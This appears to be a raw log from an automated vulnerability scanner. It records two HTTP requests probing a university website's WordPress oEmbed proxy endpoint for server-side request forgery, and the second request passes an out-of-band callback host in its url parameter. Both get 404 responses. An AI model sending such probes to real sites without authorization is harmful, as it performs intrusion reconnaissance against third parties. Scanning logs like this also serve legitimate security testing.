[wordpress-ssrf-oembed] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-json/oembed/1.0/proxy


GET /wp-json/oembed/1.0/proxy HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


[wordpress-ssrf-oembed] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-json/oembed/1.0/proxy

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 536
Age: 4
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:59 GMT
Server: AmazonS3
Via: 1.1 46a0017ecef439253017ac2cc1624646.cloudfront.net (CloudFront)
X-Amz-Cf-Id: NdG5SR0_NaFoP5biS06nMrGbHU3V8Av25GLxLplTazNu19NHZnCFKg==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>404 Not Found</title></head>
<body>
<h1>404 Not Found</h1>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: 404.html</li>
<li>RequestId: 2MP3SAEWT8QB0KK7</li>
<li>HostId: YxdRLMd/aAVzUvW3shK65D57rdzxEKPJyx3UiJWW9mc17qEQteQvpJ6wrPjHiydr3UhSQnSn7/Q=</li>
</ul>
<h3>An Error Occurred While Attempting to Retrieve a Custom Error Document</h3>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: error.html</li>
</ul>
<hr/>
</body>
</html>

[wordpress-ssrf-oembed] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-json/oembed/1.0/proxy?url=http://d29n3paus8n0ghhurvjgzxnhctz4f86ba.oast.me


GET /wp-json/oembed/1.0/proxy?url=http://d29n3paus8n0ghhurvjgzxnhctz4f86ba.oast.me HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


[wordpress-ssrf-oembed] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-json/oembed/1.0/proxy?url=http://d29n3paus8n0ghhurvjgzxnhctz4f86ba.oast.me

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 536
Age: 4
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:59 GMT
Server: AmazonS3
Via: 1.1 978b1b29b70b082668c3d920b0bbe7d4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: a7P4ZimEAbLud-MdIoGsZKYrCkokGDiAVKuDgDcIntrIw76TFzdBtw==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>404 Not Found</title></head>
<body>
<h1>404 Not Found</h1>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: 404.html</li>
<li>RequestId: 2MP3SAEWT8QB0KK7</li>
<li>HostId: YxdRLMd/aAVzUvW3shK65D57rdzxEKPJyx3UiJWW9mc17qEQteQvpJ6wrPjHiydr3UhSQnSn7/Q=</li>
</ul>
<h3>An Error Occurred While Attempting to Retrieve a Custom Error Document</h3>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: error.html</li>
</ul>
<hr/>
</body>
</html>

